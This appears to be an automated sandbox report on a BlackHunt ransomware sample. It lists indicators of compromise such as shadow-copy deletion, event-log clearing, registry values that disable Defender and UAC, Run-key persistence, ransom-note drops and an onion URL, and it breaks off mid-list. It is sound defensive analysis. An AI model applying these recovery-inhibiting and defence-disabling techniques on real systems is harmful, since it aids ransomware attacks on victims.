Analysis
-
max time kernel
119s -
max time network
152s -
platform
windows10-2004_x64 -
resource
win10v2004-20231222-en -
resource tags
arch:x64arch:x86image:win10v2004-20231222-enlocale:en-usos:windows10-2004-x64system -
submitted
19/01/2024, 00:24
Static task
static1
Behavioral task
behavioral1
Sample
a3a2a82d529ec967a06ea2797a7570d00113e0ce52886fc1f79b9c81b0979d01.exe
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
a3a2a82d529ec967a06ea2797a7570d00113e0ce52886fc1f79b9c81b0979d01.exe
Resource
win10v2004-20231222-en
General
-
Target
a3a2a82d529ec967a06ea2797a7570d00113e0ce52886fc1f79b9c81b0979d01.exe
-
Size
707KB
-
MD5
afd0512e44797be9fdaf0fdd0285101b
-
SHA1
b9af6d86c5ac0f2858efe205759551f0d48625a9
-
SHA256
a3a2a82d529ec967a06ea2797a7570d00113e0ce52886fc1f79b9c81b0979d01
-
SHA512
665402b47e79d52e2b1b6f5e8d7d2eae5f63be2390533cd4bb126f7c0a71721e367c5ff4e57f3938b5e3b66a3e22ff58f3039080ac13700ff80bac5f1b1f1eef
-
SSDEEP
6144:wcmwdMZ0aq9arLKkdMqJ+VYg/5ICAAQs+d5zSTamgEoOFzxLza1X8Fvnh:6uaTmkZJ+naie5OTamgEoKxLWmhh
Malware Config
Extracted
C:\ProgramData\#BlackHunt_ReadMe.hta
http-equiv="x-ua-compatible"
http://sdjf982lkjsdvcjlksaf2kjhlksvvnktyoiasuc92lf.onion
Signatures
-
Deletes NTFS Change Journal 2 TTPs 2 IoCs
The USN change journal is a persistent log of all changes made to local files used by Windows Server systems.
pid Process 9384 fsutil.exe 11112 fsutil.exe -
description ioc Process Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" a3a2a82d529ec967a06ea2797a7570d00113e0ce52886fc1f79b9c81b0979d01.exe -
Clears Windows event logs 1 TTPs 5 IoCs
pid Process 12224 wevtutil.exe 8016 wevtutil.exe 10200 wevtutil.exe 12136 wevtutil.exe 12140 wevtutil.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 4 IoCs
pid Process 9372 bcdedit.exe 9328 bcdedit.exe 5876 bcdedit.exe 8268 bcdedit.exe -
Renames multiple (3376) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
pid Process 7148 wbadmin.exe 1920 wbadmin.exe -
Disables Task Manager via registry modification
-
Disables use of System Restore points 1 TTPs
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Control Panel\International\Geo\Nation cmd.exe Key value queried \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Control Panel\International\Geo\Nation a3a2a82d529ec967a06ea2797a7570d00113e0ce52886fc1f79b9c81b0979d01.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{2C5F9FCC-F266-43F6-BFD7-838DAE269E11} = "C:\\ProgramData\\#BlackHunt_ReadMe.hta" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" a3a2a82d529ec967a06ea2797a7570d00113e0ce52886fc1f79b9c81b0979d01.exe -
Enumerates connected drives 3 TTPs 27 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\J: a3a2a82d529ec967a06ea2797a7570d00113e0ce52886fc1f79b9c81b0979d01.exe File opened (read-only) \??\K: a3a2a82d529ec967a06ea2797a7570d00113e0ce52886fc1f79b9c81b0979d01.exe File opened (read-only) \??\Z: a3a2a82d529ec967a06ea2797a7570d00113e0ce52886fc1f79b9c81b0979d01.exe File opened (read-only) \??\G: a3a2a82d529ec967a06ea2797a7570d00113e0ce52886fc1f79b9c81b0979d01.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\E: a3a2a82d529ec967a06ea2797a7570d00113e0ce52886fc1f79b9c81b0979d01.exe File opened (read-only) \??\Y: a3a2a82d529ec967a06ea2797a7570d00113e0ce52886fc1f79b9c81b0979d01.exe File opened (read-only) \??\S: a3a2a82d529ec967a06ea2797a7570d00113e0ce52886fc1f79b9c81b0979d01.exe File opened (read-only) \??\H: a3a2a82d529ec967a06ea2797a7570d00113e0ce52886fc1f79b9c81b0979d01.exe File opened (read-only) \??\L: a3a2a82d529ec967a06ea2797a7570d00113e0ce52886fc1f79b9c81b0979d01.exe File opened (read-only) \??\V: a3a2a82d529ec967a06ea2797a7570d00113e0ce52886fc1f79b9c81b0979d01.exe File opened (read-only) \??\M: fsutil.exe File opened (read-only) \??\W: a3a2a82d529ec967a06ea2797a7570d00113e0ce52886fc1f79b9c81b0979d01.exe File opened (read-only) \??\U: a3a2a82d529ec967a06ea2797a7570d00113e0ce52886fc1f79b9c81b0979d01.exe File opened (read-only) \??\O: a3a2a82d529ec967a06ea2797a7570d00113e0ce52886fc1f79b9c81b0979d01.exe File opened (read-only) \??\B: a3a2a82d529ec967a06ea2797a7570d00113e0ce52886fc1f79b9c81b0979d01.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\F: fsutil.exe File opened (read-only) \??\Q: a3a2a82d529ec967a06ea2797a7570d00113e0ce52886fc1f79b9c81b0979d01.exe File opened (read-only) \??\R: a3a2a82d529ec967a06ea2797a7570d00113e0ce52886fc1f79b9c81b0979d01.exe File opened (read-only) \??\T: a3a2a82d529ec967a06ea2797a7570d00113e0ce52886fc1f79b9c81b0979d01.exe File opened (read-only) \??\P: a3a2a82d529ec967a06ea2797a7570d00113e0ce52886fc1f79b9c81b0979d01.exe File opened (read-only) \??\M: a3a2a82d529ec967a06ea2797a7570d00113e0ce52886fc1f79b9c81b0979d01.exe File opened (read-only) \??\I: a3a2a82d529ec967a06ea2797a7570d00113e0ce52886fc1f79b9c81b0979d01.exe File opened (read-only) \??\A: a3a2a82d529ec967a06ea2797a7570d00113e0ce52886fc1f79b9c81b0979d01.exe File opened (read-only) \??\N: a3a2a82d529ec967a06ea2797a7570d00113e0ce52886fc1f79b9c81b0979d01.exe File opened (read-only) \??\X: a3a2a82d529ec967a06ea2797a7570d00113e0ce52886fc1f79b9c81b0979d01.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 8 ip-api.com -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\#BlackHunt_BG.jpg" a3a2a82d529ec967a06ea2797a7570d00113e0ce52886fc1f79b9c81b0979d01.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\images\themes\dark\#BlackHunt_ReadMe.txt a3a2a82d529ec967a06ea2797a7570d00113e0ce52886fc1f79b9c81b0979d01.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\root\#BlackHunt_ReadMe.txt a3a2a82d529ec967a06ea2797a7570d00113e0ce52886fc1f79b9c81b0979d01.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\ru-ru\#BlackHunt_ReadMe.txt a3a2a82d529ec967a06ea2797a7570d00113e0ce52886fc1f79b9c81b0979d01.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\zh-tw\#BlackHunt_Private.key a3a2a82d529ec967a06ea2797a7570d00113e0ce52886fc1f79b9c81b0979d01.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\js\nls\fi-fi\ui-strings.js a3a2a82d529ec967a06ea2797a7570d00113e0ce52886fc1f79b9c81b0979d01.exe File created C:\Program Files\VideoLAN\VLC\locale\my\LC_MESSAGES\#BlackHunt_ReadMe.txt a3a2a82d529ec967a06ea2797a7570d00113e0ce52886fc1f79b9c81b0979d01.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\zh-tw\#BlackHunt_ReadMe.hta a3a2a82d529ec967a06ea2797a7570d00113e0ce52886fc1f79b9c81b0979d01.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\ru-ru\#BlackHunt_ReadMe.txt a3a2a82d529ec967a06ea2797a7570d00113e0ce52886fc1f79b9c81b0979d01.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\generic-rhp-app\#BlackHunt_ReadMe.txt a3a2a82d529ec967a06ea2797a7570d00113e0ce52886fc1f79b9c81b0979d01.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\js\nls\fi-fi\#BlackHunt_ReadMe.txt a3a2a82d529ec967a06ea2797a7570d00113e0ce52886fc1f79b9c81b0979d01.exe File created C:\Program Files\VideoLAN\VLC\locale\or\#BlackHunt_ReadMe.txt a3a2a82d529ec967a06ea2797a7570d00113e0ce52886fc1f79b9c81b0979d01.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\sv-se\ui-strings.js a3a2a82d529ec967a06ea2797a7570d00113e0ce52886fc1f79b9c81b0979d01.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\ui-strings.js a3a2a82d529ec967a06ea2797a7570d00113e0ce52886fc1f79b9c81b0979d01.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\ar-ae\#BlackHunt_ReadMe.txt a3a2a82d529ec967a06ea2797a7570d00113e0ce52886fc1f79b9c81b0979d01.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\ui-strings.js a3a2a82d529ec967a06ea2797a7570d00113e0ce52886fc1f79b9c81b0979d01.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\security\blacklisted.certs a3a2a82d529ec967a06ea2797a7570d00113e0ce52886fc1f79b9c81b0979d01.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\#BlackHunt_ReadMe.hta a3a2a82d529ec967a06ea2797a7570d00113e0ce52886fc1f79b9c81b0979d01.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\pl-pl\#BlackHunt_ReadMe.txt a3a2a82d529ec967a06ea2797a7570d00113e0ce52886fc1f79b9c81b0979d01.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\#BlackHunt_Private.key a3a2a82d529ec967a06ea2797a7570d00113e0ce52886fc1f79b9c81b0979d01.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\sendforcomments.svg a3a2a82d529ec967a06ea2797a7570d00113e0ce52886fc1f79b9c81b0979d01.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\es-es\#BlackHunt_ReadMe.txt a3a2a82d529ec967a06ea2797a7570d00113e0ce52886fc1f79b9c81b0979d01.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\#BlackHunt_Private.key a3a2a82d529ec967a06ea2797a7570d00113e0ce52886fc1f79b9c81b0979d01.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\fr-ma\#BlackHunt_Private.key a3a2a82d529ec967a06ea2797a7570d00113e0ce52886fc1f79b9c81b0979d01.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\uk-ua\#BlackHunt_Private.key a3a2a82d529ec967a06ea2797a7570d00113e0ce52886fc1f79b9c81b0979d01.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\images\AddressBook2x.png a3a2a82d529ec967a06ea2797a7570d00113e0ce52886fc1f79b9c81b0979d01.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\remove.svg a3a2a82d529ec967a06ea2797a7570d00113e0ce52886fc1f79b9c81b0979d01.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\zh-tw\#BlackHunt_ReadMe.txt a3a2a82d529ec967a06ea2797a7570d00113e0ce52886fc1f79b9c81b0979d01.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\hu-hu\#BlackHunt_ReadMe.txt a3a2a82d529ec967a06ea2797a7570d00113e0ce52886fc1f79b9c81b0979d01.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ko\LC_MESSAGES\vlc.mo a3a2a82d529ec967a06ea2797a7570d00113e0ce52886fc1f79b9c81b0979d01.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\images\s_checkbox_selected_18.svg a3a2a82d529ec967a06ea2797a7570d00113e0ce52886fc1f79b9c81b0979d01.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\cs-cz\ui-strings.js a3a2a82d529ec967a06ea2797a7570d00113e0ce52886fc1f79b9c81b0979d01.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\images\themes\dark\#BlackHunt_ReadMe.txt a3a2a82d529ec967a06ea2797a7570d00113e0ce52886fc1f79b9c81b0979d01.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\en-gb\#BlackHunt_ReadMe.hta a3a2a82d529ec967a06ea2797a7570d00113e0ce52886fc1f79b9c81b0979d01.exe File created C:\Program Files\VideoLAN\VLC\locale\am\LC_MESSAGES\#BlackHunt_ReadMe.hta a3a2a82d529ec967a06ea2797a7570d00113e0ce52886fc1f79b9c81b0979d01.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_sortedby_up_hover_18.svg a3a2a82d529ec967a06ea2797a7570d00113e0ce52886fc1f79b9c81b0979d01.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\hu-hu\#BlackHunt_ReadMe.txt a3a2a82d529ec967a06ea2797a7570d00113e0ce52886fc1f79b9c81b0979d01.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\#BlackHunt_ReadMe.txt a3a2a82d529ec967a06ea2797a7570d00113e0ce52886fc1f79b9c81b0979d01.exe File created C:\Program Files\VideoLAN\VLC\locale\lv\#BlackHunt_ReadMe.txt a3a2a82d529ec967a06ea2797a7570d00113e0ce52886fc1f79b9c81b0979d01.exe File created C:\Program Files\VideoLAN\VLC\locale\ug\LC_MESSAGES\#BlackHunt_ReadMe.txt a3a2a82d529ec967a06ea2797a7570d00113e0ce52886fc1f79b9c81b0979d01.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\pdf.gif a3a2a82d529ec967a06ea2797a7570d00113e0ce52886fc1f79b9c81b0979d01.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\et_get.svg a3a2a82d529ec967a06ea2797a7570d00113e0ce52886fc1f79b9c81b0979d01.exe File created C:\Program Files\Java\jre-1.8\lib\images\#BlackHunt_ReadMe.txt a3a2a82d529ec967a06ea2797a7570d00113e0ce52886fc1f79b9c81b0979d01.exe File created C:\Program Files\VideoLAN\VLC\locale\zu\#BlackHunt_Private.key a3a2a82d529ec967a06ea2797a7570d00113e0ce52886fc1f79b9c81b0979d01.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\ru-ru\#BlackHunt_Private.key a3a2a82d529ec967a06ea2797a7570d00113e0ce52886fc1f79b9c81b0979d01.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\flags.png a3a2a82d529ec967a06ea2797a7570d00113e0ce52886fc1f79b9c81b0979d01.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\Font\PFM\zy______.pfm a3a2a82d529ec967a06ea2797a7570d00113e0ce52886fc1f79b9c81b0979d01.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\fi-fi\PlayStore_icon.svg a3a2a82d529ec967a06ea2797a7570d00113e0ce52886fc1f79b9c81b0979d01.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_ellipses-hover.svg a3a2a82d529ec967a06ea2797a7570d00113e0ce52886fc1f79b9c81b0979d01.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\ja-jp\ui-strings.js a3a2a82d529ec967a06ea2797a7570d00113e0ce52886fc1f79b9c81b0979d01.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\@1x\themes\dark\[email protected] a3a2a82d529ec967a06ea2797a7570d00113e0ce52886fc1f79b9c81b0979d01.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\hr-hr\#BlackHunt_ReadMe.txt a3a2a82d529ec967a06ea2797a7570d00113e0ce52886fc1f79b9c81b0979d01.exe File created C:\Program Files\Java\jre-1.8\lib\management\#BlackHunt_ReadMe.txt a3a2a82d529ec967a06ea2797a7570d00113e0ce52886fc1f79b9c81b0979d01.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\ar-ae\#BlackHunt_ReadMe.hta a3a2a82d529ec967a06ea2797a7570d00113e0ce52886fc1f79b9c81b0979d01.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\move.svg a3a2a82d529ec967a06ea2797a7570d00113e0ce52886fc1f79b9c81b0979d01.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\themes\dark\bun.png a3a2a82d529ec967a06ea2797a7570d00113e0ce52886fc1f79b9c81b0979d01.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\sv-se\PlayStore_icon.svg a3a2a82d529ec967a06ea2797a7570d00113e0ce52886fc1f79b9c81b0979d01.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\fi-fi\#BlackHunt_ReadMe.txt a3a2a82d529ec967a06ea2797a7570d00113e0ce52886fc1f79b9c81b0979d01.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\images\adobe_spinner.gif a3a2a82d529ec967a06ea2797a7570d00113e0ce52886fc1f79b9c81b0979d01.exe File opened for modification C:\Program Files\7-Zip\Lang\mr.txt a3a2a82d529ec967a06ea2797a7570d00113e0ce52886fc1f79b9c81b0979d01.exe File opened for modification C:\Program Files\Java\jdk-1.8\legal\jdk\bcel.md a3a2a82d529ec967a06ea2797a7570d00113e0ce52886fc1f79b9c81b0979d01.exe File opened for modification C:\Program Files\PublishSync.xml a3a2a82d529ec967a06ea2797a7570d00113e0ce52886fc1f79b9c81b0979d01.exe File created C:\Program Files\VideoLAN\VLC\locale\ro\LC_MESSAGES\#BlackHunt_ReadMe.txt a3a2a82d529ec967a06ea2797a7570d00113e0ce52886fc1f79b9c81b0979d01.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\images\#BlackHunt_Private.key a3a2a82d529ec967a06ea2797a7570d00113e0ce52886fc1f79b9c81b0979d01.exe File created C:\Program Files\VideoLAN\VLC\#BlackHunt_ReadMe.hta a3a2a82d529ec967a06ea2797a7570d00113e0ce52886fc1f79b9c81b0979d01.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
pid pid_target Process procid_target 16880 11536 WerFault.exe 296 -
Checks SCSI registry key(s) 3 TTPs 4 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 vds.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName vds.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000 vds.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\FriendlyName vds.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 7208 schtasks.exe -
Interacts with shadow copies 2 TTPs 6 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 14516 vssadmin.exe 1036 vssadmin.exe 9900 vssadmin.exe 8780 vssadmin.exe 9308 vssadmin.exe 9268 vssadmin.exe -
Kills process with taskkill 1 IoCs
pid Process 11312 taskkill.exe -
Modifies registry class 9 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\ Conhost.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2\DefaultIcon reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\ reg.exe Key created \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Local Settings cmd.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2 Conhost.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 13672 PING.EXE -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 5044 a3a2a82d529ec967a06ea2797a7570d00113e0ce52886fc1f79b9c81b0979d01.exe -
Suspicious use of AdjustPrivilegeToken 24 IoCs
description pid Process Token: SeDebugPrivilege 5044 a3a2a82d529ec967a06ea2797a7570d00113e0ce52886fc1f79b9c81b0979d01.exe Token: SeRestorePrivilege 5044 a3a2a82d529ec967a06ea2797a7570d00113e0ce52886fc1f79b9c81b0979d01.exe Token: SeBackupPrivilege 5044 a3a2a82d529ec967a06ea2797a7570d00113e0ce52886fc1f79b9c81b0979d01.exe Token: SeTakeOwnershipPrivilege 5044 a3a2a82d529ec967a06ea2797a7570d00113e0ce52886fc1f79b9c81b0979d01.exe Token: SeAuditPrivilege 5044 a3a2a82d529ec967a06ea2797a7570d00113e0ce52886fc1f79b9c81b0979d01.exe Token: SeSecurityPrivilege 5044 a3a2a82d529ec967a06ea2797a7570d00113e0ce52886fc1f79b9c81b0979d01.exe Token: SeIncBasePriorityPrivilege 5044 a3a2a82d529ec967a06ea2797a7570d00113e0ce52886fc1f79b9c81b0979d01.exe Token: SeBackupPrivilege 5640 vssvc.exe Token: SeRestorePrivilege 5640 vssvc.exe Token: SeAuditPrivilege 5640 vssvc.exe Token: SeBackupPrivilege 9724 wbengine.exe Token: SeRestorePrivilege 9724 wbengine.exe Token: SeSecurityPrivilege 9724 wbengine.exe Token: SeSecurityPrivilege 8016 wevtutil.exe Token: SeBackupPrivilege 8016 wevtutil.exe Token: SeSecurityPrivilege 12224 wevtutil.exe Token: SeBackupPrivilege 12224 wevtutil.exe Token: SeSecurityPrivilege 12140 wevtutil.exe Token: SeBackupPrivilege 12140 wevtutil.exe Token: SeSecurityPrivilege 12136 wevtutil.exe Token: SeBackupPrivilege 12136 wevtutil.exe Token: SeSecurityPrivilege 10200 wevtutil.exe Token: SeBackupPrivilege 10200 wevtutil.exe Token: SeDebugPrivilege 11312 taskkill.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 5044 wrote to memory of 3460 5044 a3a2a82d529ec967a06ea2797a7570d00113e0ce52886fc1f79b9c81b0979d01.exe 92 PID 5044 wrote to memory of 3460 5044 a3a2a82d529ec967a06ea2797a7570d00113e0ce52886fc1f79b9c81b0979d01.exe 92 PID 5044 wrote to memory of 3644 5044 a3a2a82d529ec967a06ea2797a7570d00113e0ce52886fc1f79b9c81b0979d01.exe 157 PID 5044 wrote to memory of 3644 5044 a3a2a82d529ec967a06ea2797a7570d00113e0ce52886fc1f79b9c81b0979d01.exe 157 PID 5044 wrote to memory of 5036 5044 a3a2a82d529ec967a06ea2797a7570d00113e0ce52886fc1f79b9c81b0979d01.exe 96 PID 5044 wrote to memory of 5036 5044 a3a2a82d529ec967a06ea2797a7570d00113e0ce52886fc1f79b9c81b0979d01.exe 96 PID 3460 wrote to memory of 4828 3460 cmd.exe 155 PID 3460 wrote to memory of 4828 3460 cmd.exe 155 PID 5044 wrote to memory of 672 5044 a3a2a82d529ec967a06ea2797a7570d00113e0ce52886fc1f79b9c81b0979d01.exe 99 PID 5044 wrote to memory of 672 5044 a3a2a82d529ec967a06ea2797a7570d00113e0ce52886fc1f79b9c81b0979d01.exe 99 PID 5044 wrote to memory of 2228 5044 a3a2a82d529ec967a06ea2797a7570d00113e0ce52886fc1f79b9c81b0979d01.exe 101 PID 5044 wrote to memory of 2228 5044 a3a2a82d529ec967a06ea2797a7570d00113e0ce52886fc1f79b9c81b0979d01.exe 101 PID 3644 wrote to memory of 1580 3644 reg.exe 103 PID 3644 wrote to memory of 1580 3644 reg.exe 103 PID 5036 wrote to memory of 5116 5036 cmd.exe 104 PID 5036 wrote to memory of 5116 5036 cmd.exe 104 PID 5044 wrote to memory of 2416 5044 a3a2a82d529ec967a06ea2797a7570d00113e0ce52886fc1f79b9c81b0979d01.exe 189 PID 5044 wrote to memory of 2416 5044 a3a2a82d529ec967a06ea2797a7570d00113e0ce52886fc1f79b9c81b0979d01.exe 189 PID 5044 wrote to memory of 4696 5044 a3a2a82d529ec967a06ea2797a7570d00113e0ce52886fc1f79b9c81b0979d01.exe 107 PID 5044 wrote to memory of 4696 5044 a3a2a82d529ec967a06ea2797a7570d00113e0ce52886fc1f79b9c81b0979d01.exe 107 PID 5044 wrote to memory of 4648 5044 a3a2a82d529ec967a06ea2797a7570d00113e0ce52886fc1f79b9c81b0979d01.exe 163 PID 5044 wrote to memory of 4648 5044 a3a2a82d529ec967a06ea2797a7570d00113e0ce52886fc1f79b9c81b0979d01.exe 163 PID 5044 wrote to memory of 2356 5044 a3a2a82d529ec967a06ea2797a7570d00113e0ce52886fc1f79b9c81b0979d01.exe 117 PID 5044 wrote to memory of 2356 5044 a3a2a82d529ec967a06ea2797a7570d00113e0ce52886fc1f79b9c81b0979d01.exe 117 PID 672 wrote to memory of 1540 672 cmd.exe 111 PID 672 wrote to memory of 1540 672 cmd.exe 111 PID 5044 wrote to memory of 3036 5044 a3a2a82d529ec967a06ea2797a7570d00113e0ce52886fc1f79b9c81b0979d01.exe 112 PID 5044 wrote to memory of 3036 5044 a3a2a82d529ec967a06ea2797a7570d00113e0ce52886fc1f79b9c81b0979d01.exe 112 PID 5044 wrote to memory of 1960 5044 a3a2a82d529ec967a06ea2797a7570d00113e0ce52886fc1f79b9c81b0979d01.exe 115 PID 5044 wrote to memory of 1960 5044 